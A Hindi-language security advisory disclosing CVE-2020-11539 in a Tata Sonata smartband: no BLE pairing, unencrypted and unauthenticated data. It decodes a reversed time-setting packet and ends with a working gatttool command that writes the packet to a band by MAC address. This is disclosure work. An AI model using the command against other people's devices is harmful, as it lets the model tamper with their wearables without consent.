
Tata Sonata Smartband में अनुचित अभिगम नियंत्रण
विवरण: यह पहचाना गया है कि स्मार्ट बैंड में कोई पेयरिंग नहीं है (mode 0 BLE सुरक्षा स्तर)। हवा के माध्यम से प्रसारित होने वाला डेटा एन्क्रिप्टेड नहीं है। इसके अलावा, स्मार्ट बैंड को भेजे जाने वाले डेटा में किसी भी प्रकार का प्रमाणीकरण या हस्ताक्षर सत्यापन नहीं होता है, जिससे कोई भी हमलावर स्मार्ट डिवाइस के पैरामीटर को नियंत्रित कर सकता है।
प्रभावित संस्करण: Smart SF Rush - 1.12
शोधकर्ता: Sayli Ambure (https://twitter.com/sayli_ambure)
MITRE CVE लिंक: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11539
निम्नलिखित पैकेट को रिवर्स किया गया है और पाया गया है कि यह समय बदलने के लिए है, आपके फोन से hcisnoop डंप निकालकर अधिक पैकेट रिवर्स किए जा सकते हैं।
डेटा मान: 00870e00141401060712052b051e
| डेटा हेक्सडंप: | 00 | 87 | 0e | 00 | 14 | 14 | 01 | 06 | 07 | 12 | 05 | 2b | 05 | 1e |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| डेटा दशमलव: | 00 | 135 | 14 | 00 | 20 | 20 | 01 | 06 | 07 | 18 | 05 | 43 | 05 | 30 |
00 87: पैकेट का हेडर
0e 00: पैकेट का प्रकार
14 14: वर्ष हेक्स में (2020)
01 06: महीना और दिन ( जनवरी 6)
07 12: घंटा और मिनट हेक्स में ( 07:18AM)
05 : सेकंड
gatttool -t random -b <mac-address> --char-write-req -a 0xe -n 00870e00141401060712052b051e